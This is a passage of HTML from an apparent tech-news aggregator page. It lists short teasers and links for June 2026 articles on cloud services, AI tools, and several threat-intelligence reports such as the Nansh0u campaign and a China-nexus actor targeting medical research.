          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-platforms"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="group relative scroll-mt-24">
        <a href="#h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Keep Your Tech Flame Alive: Trailblazer Rachel Bayley
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-keep-your-tech-flame-alive-trailblazer-rachel-bayley"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In this Akamai FLAME Trailblazer blog post, Rachel Bayley encourages women to step into the unknown and to be their authentic selves.</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/culture/2024/may/keep-your-tech-flame-alive-trailblazer-rachel-bayley"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-oracle-of-delphi-will-steal-your-credentials" class="group relative scroll-mt-24">
        <a href="#h3-the-oracle-of-delphi-will-steal-your-credentials" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Oracle of Delphi Will Steal Your Credentials
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-oracle-of-delphi-will-steal-your-credentials"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Our deception technology is able to reroute attackers into honeypots, where they believe that they found their real target. The attacks brute forced passwords for RDP credentials to connect to the vic</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-oracle-of-delphi-steal-your-credentials"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="group relative scroll-mt-24">
        <a href="#h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Nansh0u Campaign – Hackers Arsenal Grows Stronger
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-nansh0u-campaign-hackers-arsenal-grows-stronger"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>In the beginning of April, three attacks detected in the Guardicore Global Sensor Network (GGSN) caught our attention. All three had source IP addresses originating in South-Africa and hosted by Volum</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/the-nansh0u-campaign-hackers-arsenal-grows-stronger"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-public-and-private-medical-community-targeted-by-china-nexus-threat-actor-pursuing-artificial-intelligence-cyber-medical-and-national-defense-research" class="group relative scroll-mt-24">
        <a href="#h3-public-and-private-medical-community-targeted-by-china-nexus-threat-actor-pursuing-artificial-intelligence-cyber-medical-and-national-defense-research" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Public and Private Medical Community Targeted by China-Nexus Threat Actor Pursuing Artificial Intelligence, Cyber, Medical, and National Defense Research
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-public-and-private-medical-community-targeted-by-china-nexus-threat-actor-pursuing-artificial-intelligence-cyber-medical-and-national-defense-research"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Google Threat Intelligence Group (GTIG) has identified a sophisticated campaign attributed to UNC6508, a People&#39;s Republic of China (PRC)-nexus threat actor, targeting institutions in the North Americ</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/threat-intelligence/prc-targets-us-medical-research/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-your-ai-generated-app-runs-on-their-cloud-and-thats-the-problem" class="group relative scroll-mt-24">
        <a href="#h3-your-ai-generated-app-runs-on-their-cloud-and-thats-the-problem" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Your AI-generated app runs on their cloud, and that’s the problem
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-your-ai-generated-app-runs-on-their-cloud-and-thats-the-problem"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The prompt-to-app loop has gotten genuinely good. Describe the thing, watch it appear, click deploy. Replit, Lovable, Base44 and others The post Your AI-generated app runs on their cloud, and that’s t</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/your-ai-generated-app-runs-on-their-cloud-and-thats-the-problem/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-growing-the-cloudflare-ai-team-with-talent-from-ensemble-ai" class="group relative scroll-mt-24">
        <a href="#h3-growing-the-cloudflare-ai-team-with-talent-from-ensemble-ai" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Growing the Cloudflare AI team with talent from Ensemble AI
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-growing-the-cloudflare-ai-team-with-talent-from-ensemble-ai"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Cloudflare is deepening our investment in AI with the addition of team members from Ensemble AI, focusing on machine learning infrastructure and efficiency.</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Cloudflare Blog</strong></p>
<p><a href="https://blog.cloudflare.com/ensemble-ai-talent-joins-cloudflare/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-new-ai-computing-stack-a-guide-for-tech-leaders-to-navigate-shifting-power-dynamics" class="group relative scroll-mt-24">
        <a href="#h3-the-new-ai-computing-stack-a-guide-for-tech-leaders-to-navigate-shifting-power-dynamics" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The New AI Computing Stack: A Guide for Tech Leaders to Navigate Shifting Power Dynamics
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-new-ai-computing-stack-a-guide-for-tech-leaders-to-navigate-shifting-power-dynamics"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Key Takeaways AI isn’t a feature you bolt onto your existing infrastructure, but something driving an entirely new computing architecture. According to the Forrester report, the traditional three-cate</p>
<p><strong>📅 Jun 14, 2026</strong> • <strong>📰 SUSE Blog</strong></p>
<p><a href="https://www.suse.com/c/the-new-ai-computing-stack-a-guide-for-tech-leaders-to-navigate-shifting-power-dynamics/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-lightsail-is-now-available-in-three-additional-aws-regions" class="group relative scroll-mt-24">
        <a href="#h3-amazon-lightsail-is-now-available-in-three-additional-aws-regions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon Lightsail is now available in three additional AWS Regions
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-lightsail-is-now-available-in-three-additional-aws-regions"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Starting today, Amazon Lightsail is available in three additional AWS Regions: Asia Pacific (Hong Kong), South America (São Paulo), and Europe (Spain). This expansion brings the power and simplicity o</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-lightsail-aws-regions/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-whats-new-with-google-cloud" class="group relative scroll-mt-24">
        <a href="#h3-whats-new-with-google-cloud" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 What’s new with Google Cloud
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-whats-new-with-google-cloud"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-ec2-i7i-instances-now-available-in-aws-europe-paris-region" class="group relative scroll-mt-24">
        <a href="#h3-amazon-ec2-i7i-instances-now-available-in-aws-europe-paris-region" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon EC2 I7i instances now available in AWS Europe (Paris) Region
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-ec2-i7i-instances-now-available-in-aws-europe-paris-region"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>AWS is announcing the availability of high performance Storage optimized Amazon EC2 I7i instances in AWS Europe (Paris) region. Powered by 5th Gen Intel Xeon Processors with an all-core turbo frequenc</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-ec2-i7i-instances-europe-paris-region/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-ec2-capacity-blocks-for-ml-is-now-available-in-aws-govcloud-us-regions" class="group relative scroll-mt-24">
        <a href="#h3-amazon-ec2-capacity-blocks-for-ml-is-now-available-in-aws-govcloud-us-regions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon EC2 Capacity Blocks for ML is now available in AWS GovCloud (US) Regions
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-ec2-capacity-blocks-for-ml-is-now-available-in-aws-govcloud-us-regions"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Amazon EC2 Capacity Blocks for ML is now available in AWS GovCloud (US-West) and AWS GovCloud (US-East), enabling government and regulated-industry customers to reserve GPU capacity for machine learni</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-ec2-capacity-blocks-ml-govcloud/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-the-open-knowledge-format" class="group relative scroll-mt-24">
        <a href="#h3-introducing-the-open-knowledge-format" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing the Open Knowledge Format
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-introducing-the-open-knowledge-format"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>As foundation models continue to improve, the lack of relevant context often limits what they can do, especially as they are used to build agentic systems. While these models can help you write code, </p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 Google Cloud Blog</strong></p>
<p><a href="https://cloud.google.com/blog/products/data-analytics/how-the-open-knowledge-format-can-improve-data-sharing/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-misc" class="group relative scroll-mt-24">
        <a href="#h2-misc" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📰 Misc
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-misc"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-visual-studio-code-1125" class="group relative scroll-mt-24">
        <a href="#h3-visual-studio-code-1125" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Visual Studio Code 1.125
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-visual-studio-code-1125"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn what&#39;s new in Visual Studio Code 1.125 (Insiders) Read the full article</p>
<p><strong>📅 Jun 17, 2026</strong> • <strong>📰 VS Code Blog</strong></p>
<p><a href="https://code.visualstudio.com/updates/v1_125"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-cohere-sold-sovereign-ai-to-enterprises-now-its-targeting-developers-with-its-first-coding-model" class="group relative scroll-mt-24">
        <a href="#h3-cohere-sold-sovereign-ai-to-enterprises-now-its-targeting-developers-with-its-first-coding-model" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Cohere sold sovereign AI to enterprises, now it’s targeting developers with its first coding model
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-cohere-sold-sovereign-ai-to-enterprises-now-its-targeting-developers-with-its-first-coding-model"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Canadian foundation model company Cohere has spent the past few years selling a specific idea to banks, governments, and healthcare The post Cohere sold sovereign AI to enterprises, now it’s targeting</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/cohere-sovereign-coding-model-north-mini-code/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-weve-been-measuring-ai-wrong-why-economically-valuable-work-is-the-new-benchmark" class="group relative scroll-mt-24">
        <a href="#h3-weve-been-measuring-ai-wrong-why-economically-valuable-work-is-the-new-benchmark" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 We’ve been measuring AI wrong; why economically valuable work is the new benchmark
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-weve-been-measuring-ai-wrong-why-economically-valuable-work-is-the-new-benchmark"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>As the AI industry gradually builds standardization guidelines and systems, such as those overseen by the Tokenonmics Foundation, the need The post We’ve been measuring AI wrong; why economically valu</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/agents-last-exam-benchmark/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-ten-great-devops-job-opportunities" class="group relative scroll-mt-24">
        <a href="#h3-ten-great-devops-job-opportunities" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Ten Great DevOps Job Opportunities
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-ten-great-devops-job-opportunities"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>DevOps.com is now providing a weekly DevOps jobs report through which opportunities for DevOps professionals will be highlighted as part of an effort to better serve our audience. Our goal in these ch</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/ten-great-devops-job-opportunities-10/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-code-is-a-message-to-the-future" class="group relative scroll-mt-24">
        <a href="#h3-code-is-a-message-to-the-future" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Code is a message to the future
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-code-is-a-message-to-the-future"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Engineers communicate constantly. Slack messages, design docs, RFC threads, code review comments: the job is as much about sharing intent The post Code is a message to the future appeared first on The</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 The New Stack</strong></p>
<p><a href="https://thenewstack.io/code-message-to-future/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-moonshot-ais-kimi-k27-code-targets-token-efficiency-in-agentic-coding" class="group relative scroll-mt-24">
        <a href="#h3-moonshot-ais-kimi-k27-code-targets-token-efficiency-in-agentic-coding" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Moonshot AI’s Kimi K2.7-Code Targets Token Efficiency in Agentic Coding
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-moonshot-ais-kimi-k27-code-targets-token-efficiency-in-agentic-coding"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Moonshot AI&#39;s Kimi K2.7-Code offers 30% lower token usage and a 21.8% coding benchmark gain — here&#39;s what DevOps teams need to know about the open-source release.</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/moonshot-ais-kimi-k2-7-code-targets-token-efficiency-in-agentic-coding/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-protecting-enterprise-ai-how-to-manage-api-keys-in-models-as-a-service-maas" class="group relative scroll-mt-24">
        <a href="#h3-protecting-enterprise-ai-how-to-manage-api-keys-in-models-as-a-service-maas" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Protecting enterprise AI: How to manage API keys in Models-as-a-Service (MaaS)
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-protecting-enterprise-ai-how-to-manage-api-keys-in-models-as-a-service-maas"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Every team that moves an AI model from experimentation to production hits the same wall. The model works. The serving stack works. Then someone asks how the continuous integration (CI) pipeline is goi</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
